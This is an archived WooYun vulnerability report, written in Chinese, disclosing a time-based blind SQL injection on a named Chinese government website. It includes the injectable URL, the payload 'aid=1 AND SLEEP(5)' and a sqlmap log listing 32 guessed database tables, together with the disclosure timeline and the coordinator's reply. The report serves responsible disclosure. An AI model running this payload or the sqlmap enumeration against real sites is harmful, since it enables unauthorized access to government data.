当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095946

漏洞标题:遵义市工商行政管理局SQL注入一枚

相关厂商:cncert

漏洞作者: ucifer

提交时间:2015-02-06 17:40

修复时间:2015-03-23 17:42

公开时间:2015-03-23 17:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

RT~~

详细说明:

http://www.zyaic.gov.cn/include/Viewer/Viewer.php?aid=1
aid参数存在时间盲注

QQ截图20150206020101.png


Place: GET
Parameter: aid
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: aid=1 AND SLEEP(5)
---
[01:56:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: ASP.NET, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[01:56:51] [INFO] fetching tables for database: 'zyaic'
[01:56:51] [INFO] fetching number of tables for database 'zyaic'
[01:56:51] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[01:57:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[01:57:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:57:03] [WARNING] unable to retrieve the number of tables for database 'zyaic'
[01:57:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[01:57:07] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[01:57:07] [INFO] adding words used on web page to the check list
[01:57:44] [INFO] tried 81/3319 items (2%)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:57:57] [INFO] retrieved: topics                                            
[01:59:05] [INFO] retrieved: pma_history                                       
[01:59:57] [INFO] tried 339/3319 items (10%)
[01:59:58] [INFO] adjusting time delay to 2 seconds due to good response times
[01:59:58] [INFO] retrieved: CurrentUsers                                      
[02:00:02] [INFO] retrieved: vcd_IMDB                                          
[02:00:53] [INFO] retrieved: vcd_Covers                                        
[02:01:16] [INFO] retrieved: DUMMY                                             
[02:02:39] [INFO] retrieved: cmPublicationDetail                               
[02:02:49] [INFO] retrieved: phpbb_topics                                      
[02:03:47] [INFO] retrieved: guava_roles                                       
[02:03:58] [INFO] retrieved: jos_components                                    
[02:04:34] [INFO] retrieved: document                                          
[02:06:15] [INFO] retrieved: EthnicGroup                                       
[02:07:48] [INFO] retrieved: adv                                               
[02:09:35] [INFO] retrieved: jforum_forums                                     
[02:10:38] [INFO] retrieved: jos_newsfeeds                                     
[02:11:21] [INFO] retrieved: admin_user                                        
[02:12:14] [INFO] retrieved: reguser                                           
[02:12:49] [INFO] retrieved: ActiveDataFeed                                    
[02:13:06] [INFO] retrieved: States                                            
[02:13:25] [INFO] retrieved: tblNews                                           
[02:13:26] [INFO] retrieved: tblOrders                                         
[02:17:07] [INFO] retrieved: oil_biolmed_land                                  
[02:17:31] [INFO] retrieved: oil_core_acl_aro_groups                           
[02:17:49] [INFO] retrieved: spip_messages                                     
[02:18:28] [INFO] retrieved: nuke_main                                         
[02:18:34] [INFO] retrieved: nuke_bbwords                                      
[02:20:42] [INFO] retrieved: studierende                                       
[02:20:52] [INFO] retrieved: tx_tcdirectmail_sentlog                           
[02:22:34] [INFO] retrieved: DEPARTAMENTOS                                     
[02:22:49] [INFO] retrieved: cdb_creditslog                                    
[02:23:25] [INFO] retrieved: pw_msg                                            
[02:23:44] [INFO] retrieved: pw_members                                        
                                                                               
Database: zyaic
[32 tables]
+-------------------------+
| ActiveDataFeed          |
| CurrentUsers            |
| DEPARTAMENTOS           |
| DUMMY                   |
| EthnicGroup             |
| States                  |
| admin_user              |
| adv                     |
| cdb_creditslog          |
| cmPublicationDetail     |
| document                |
| guava_roles             |
| jforum_forums           |
| jos_components          |
| jos_newsfeeds           |
| nuke_bbwords            |
| nuke_main               |
| oil_biolmed_land        |
| oil_core_acl_aro_groups |
| phpbb_topics            |
| pma_history             |
| pw_members              |
| pw_msg                  |
| reguser                 |
| spip_messages           |
| studierende             |
| tblNews                 |
| tblOrders               |
| topics                  |
| tx_tcdirectmail_sentlog |
| vcd_Covers              |
| vcd_IMDB

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 ucifer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-11 13:51

厂商回复:

CNVD未直接复现所述情况,按照漏洞报送者所述情况整理通报,转由CNCERT下发给贵州分中心,由贵州分中心后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论